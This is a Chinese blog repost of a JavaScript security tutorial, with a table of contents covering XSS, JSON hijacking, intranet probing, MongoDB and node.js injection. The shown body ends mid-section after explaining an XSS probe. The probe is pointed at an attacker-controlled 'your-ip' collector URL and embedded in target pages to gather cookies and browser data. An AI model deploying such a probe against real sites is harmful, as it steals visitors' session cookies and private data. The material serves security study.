当前位置: 首页 > news >正文

【网络安全】从浏览器到服务端讲JavaScript安全

未经许可,不得转载。
原作者余弦,本文对原文进行二次创作。

文章目录

    • 基本隐私收集
      • XSS探针
      • JSON 劫持
    • 内网浅渗透
      • 内网IP获取
      • 内网IP端口获取
      • 内网主机存活获取
      • 路由Web控制台操作
      • 内网脆弱Web应用控制
    • 突破浏览器边界
    • XSS Virus攻击
    • MongoDB
      • 数组绕过注入攻击
      • MongoDB 查询条件绕过(Bypass)与 PHP 传参漏洞
      • JavaScript 注入攻击
    • node.js
      • 瘟神eval
      • 本地文件包含

基本隐私收集

XSS探针

项目地址:

https://github.com/evilcos/xssprobe

用途:获取目标网站的通用数据,包括 referer、location、toplocation、cookie、domain、title、screen、flash 、browser、ua、lang 等。

使用步骤

  1. 对 probe.js 进行修改,将 http_server 配置为自己的 probe.php 网址,格式如 http_server = “http://your-ip/xssprobe/probe.php?c=”; 。

  2. 在目标页面中嵌入 probe.js 脚本,具体操作可参考 demo.html。

例图:

在这里插入图片描述

JSON 劫持

JSON 是一种常用于数据交

相关文章:

  • 星型拓扑网络发生网络风暴
  • 鸿蒙ArkTS+ArkUI实现五子棋游戏
  • C++ 异常 【无敌详细版】
  • 用逻辑分析仪分析Usart波形
  • 如何使用ncurses库并在Linux上编译?
  • C++Primer学习(13.1 拷贝、赋值与销毁)
  • OSPF-8 OSPF特殊区域NSSA
  • 基于 FPGA的HLS技术与应用
  • 『 C++ 』多线程编程中的参数传递技巧
  • 23 种设计模式中的访问者模式
  • 【大模型算法工程】大模型应用工具化、忠诚度以及知识库场景下PDF双栏解析问题的讨论
  • 视点游动生成光照贴图
  • 3.21学习总结 Java字符串+Static关键字
  • AI Agent开发大全第一课-AI是什么以及如何使用AI
  • Unity代码中修改动画速度
  • Python 面向对象三大特性深度解析
  • C#与西门子PLC的六大通信库
  • VSCode中搜索插件显示“提取扩展时出错。Failed to fetch”问题解决!
  • java基础--序列化与反序列化的概念是什么?
  • 大数据学习(80)-数仓分层
  • 未来之城湖州,正在书写怎样的城市未来
  • 网络主播直播泄机密,别让这些“小事”成威胁国家安全的“突破口”
  • 洞天寻隐·学林纪丨玉洞桃源:仇英青绿山水画中的洞天与身体
  • 绍兴柯桥:用一块布托起中国制造的新经纬
  • 复旦设立新文科发展基金,校友曹国伟、王长田联合捐赠1亿助力人文学科与社会科学创新
  • 全球第七个迪士尼主题公园将落户阿布扎比